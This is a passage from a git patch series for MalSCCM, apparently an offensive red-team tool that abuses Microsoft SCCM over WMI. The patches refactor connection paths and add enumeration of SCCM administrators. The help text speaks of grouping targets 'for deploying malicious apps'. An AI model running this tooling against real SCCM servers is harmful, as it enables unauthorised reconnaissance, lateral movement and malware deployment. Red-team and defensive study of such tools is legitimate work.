Group.TargetCollectionID; var Query = new SelectQuery($"Select * FROM SMS_Application WHERE LocalizedDisplayName = '{App.AppName}'"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query); var CI_ID = ""; @@ -178,7 +178,7 @@ public static bool FbRemoveSCCMApplicationDeployment() try { var Query = new SelectQuery("Select * FROM SMS_ApplicationAssignment WHERE ApplicationName = '" + App.AppName + "'"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query); var objColl = mgmtSrchr.Get(); diff --git a/MalSCCM/lib/Check.cs b/MalSCCM/lib/Check.cs index 8992f5e..bd173ca 100644 --- a/MalSCCM/lib/Check.cs +++ b/MalSCCM/lib/Check.cs @@ -9,7 +9,7 @@ public static bool FbSCCMDeviceCheckin() { try { - var Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ClientOperation"); + var Class = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_ClientOperation"); var newInstance = Class.GetMethodParameters("InitiateClientOperation"); newInstance["Type"] = 8; diff --git a/MalSCCM/lib/Enum.cs b/MalSCCM/lib/Enum.cs index de571ff..e40c5b0 100644 --- a/MalSCCM/lib/Enum.cs +++ b/MalSCCM/lib/Enum.cs @@ -1,5 +1,7 @@ using System; +using System.Linq; using System.Management; +using System.Runtime.Remoting.Metadata.W3cXsd2001; using Microsoft.Win32; using MalSCCM.Commands; @@ -11,7 +13,7 @@ public static bool FbGetSiteScope() try { var osQuery = new SelectQuery("SMS_Authority"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\ccm"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\ccm"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, osQuery); @@ -47,7 +49,7 @@ public static bool FbGetSiteScope2() try { var osQuery = new SelectQuery("SMS_ProviderLocation"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, osQuery); @@ -102,7 +104,7 @@ public static bool FbGetSCCMComputer() try { var Query = new SelectQuery("SMS_R_System"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -131,7 +133,7 @@ public static bool FbGetSCCMADForest() try { var Query = new SelectQuery("SMS_ADForest"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -160,7 +162,7 @@ public static bool FbGetSCCMApplication() try { var Query = new SelectQuery("SMS_Application"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -189,7 +191,7 @@ public static bool FbGetSCCMPackage() try { var Query = new SelectQuery("SMS_Package"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -218,7 +220,7 @@ public static bool FbGetSCCMCollection() try { var Query = new SelectQuery("SMS_Collection"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -252,7 +254,7 @@ public static bool FbGetSCCMPrimaryUser() try { var Query = new SelectQuery("SMS_UserMachineRelationship"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -286,7 +288,7 @@ public static bool FbGetSCCMDeployments() try { var Query = new SelectQuery("SMS_ApplicationAssignment"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -340,4 +342,41 @@ public static bool FbGetSCCMPrimaryServerRegKey() return false; } } + + public static bool FbGetSCCMAdmins() + { + try + { + var query = new SelectQuery("SMS_Admin"); + var scope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); + scope.Connect(); + + var searcher = new ManagementObjectSearcher(scope, query); + + foreach (var result in searcher.Get()) + { + var logonName = result.GetPropertyValue("LogonName").ToString(); + var adminSid = result.GetPropertyValue("AdminSid").ToString(); + var roleNames = result.GetPropertyValue("RoleNames") as string[] ?? Array.Empty(); + var categoryNames = result.GetPropertyValue("CategoryNames") as string[] ?? Array.Empty(); + var collectionNames = result.GetPropertyValue("CollectionNames") as string[] ?? Array.Empty(); + + Console.WriteLine("UserName: {0}", logonName); + Console.WriteLine("SID: {0}", adminSid); + Console.WriteLine("Roles: {0}", string.Join(", ", roleNames)); + Console.WriteLine("Security Scopes: {0}", string.Join(", ", categoryNames)); + Console.WriteLine("Collections: {0}", string.Join(", ", collectionNames)); + Console.WriteLine(); + } + + return true; + } + catch (Exception e) + { + Console.WriteLine("\r\nFunction error - FbGetSCCMComputer."); + var stdErr = Console.Error; + stdErr.WriteLine($"Error Message: {e.Message}"); + return false; + } + } } diff --git a/MalSCCM/lib/Groups.cs b/MalSCCM/lib/Groups.cs index 796f4d4..baec6ec 100644 --- a/MalSCCM/lib/Groups.cs +++ b/MalSCCM/lib/Groups.cs @@ -10,7 +10,7 @@ public static bool FbGetSCCMCollectionID() try { var Query = new SelectQuery("SMS_Collection"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -53,7 +53,7 @@ public static bool FbNewSCCMCollection() { try { - var Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection"); + var Class = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode + ":SMS_Collection"); var newInstance = Class.CreateInstance(); newInstance["Name"] = Group.GroupName; @@ -92,7 +92,7 @@ public static bool FbRemoveSCCMCollection() try { var objHostSetting = new ManagementObject(); - objHostSetting.Scope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode); + objHostSetting.Scope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode); //define lookup query var strQuery = @"SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"; @@ -118,7 +118,7 @@ public static bool FbGetUserResourceID() try { var Query = new SelectQuery("SMS_R_User"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -148,13 +148,13 @@ public static bool FbAddUserToSCCMCollection() { try { - var collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); + var collQuery = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); var collQueryInstance = collQuery.CreateInstance(); collQueryInstance["QueryExpression"] = "Select * from SMS_R_User Where UniqueUserName='" + Group.UserName + "'"; collQueryInstance["RuleName"] = "Members of collection"; - var collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); + var collInstance = new ManagementObject($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); var inParams = collInstance.GetMethodParameters("AddMembershipRule"); Console.WriteLine("Commiting instance"); @@ -195,13 +195,13 @@ public static bool FbAddDeviceToSCCMCollection() { try { - var collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); + var collQuery = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); var collQueryInstance = collQuery.CreateInstance(); collQueryInstance["QueryExpression"] = "Select * from SMS_R_System Where Name='" + Group.DeviceName + "'"; collQueryInstance["RuleName"] = "Members of collection"; - var collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); + var collInstance = new ManagementObject($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); var inParams = collInstance.GetMethodParameters("AddMembershipRule"); Console.WriteLine("Commiting instance"); From 0e6797300e32319bcef69398a842f22b4e24a71b Mon Sep 17 00:00:00 2001 From: Rasta Mouse Date: Thu, 28 Sep 2023 18:24:09 +0100 Subject: [PATCH 7/7] Update Info.cs --- MalSCCM/Args/Info.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/MalSCCM/Args/Info.cs b/MalSCCM/Args/Info.cs index 2159405..4cf1a4c 100644 --- a/MalSCCM/Args/Info.cs +++ b/MalSCCM/Args/Info.cs @@ -28,7 +28,7 @@ Commands listed below have optional parameters in <>. MalSCCM.exe locate Inspect the primary server to gather SCCM information: - MalSCCM.exe inspect + MalSCCM.exe inspect Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users: MalSCCM.exe group /create /groupname:example /grouptype:[user|device]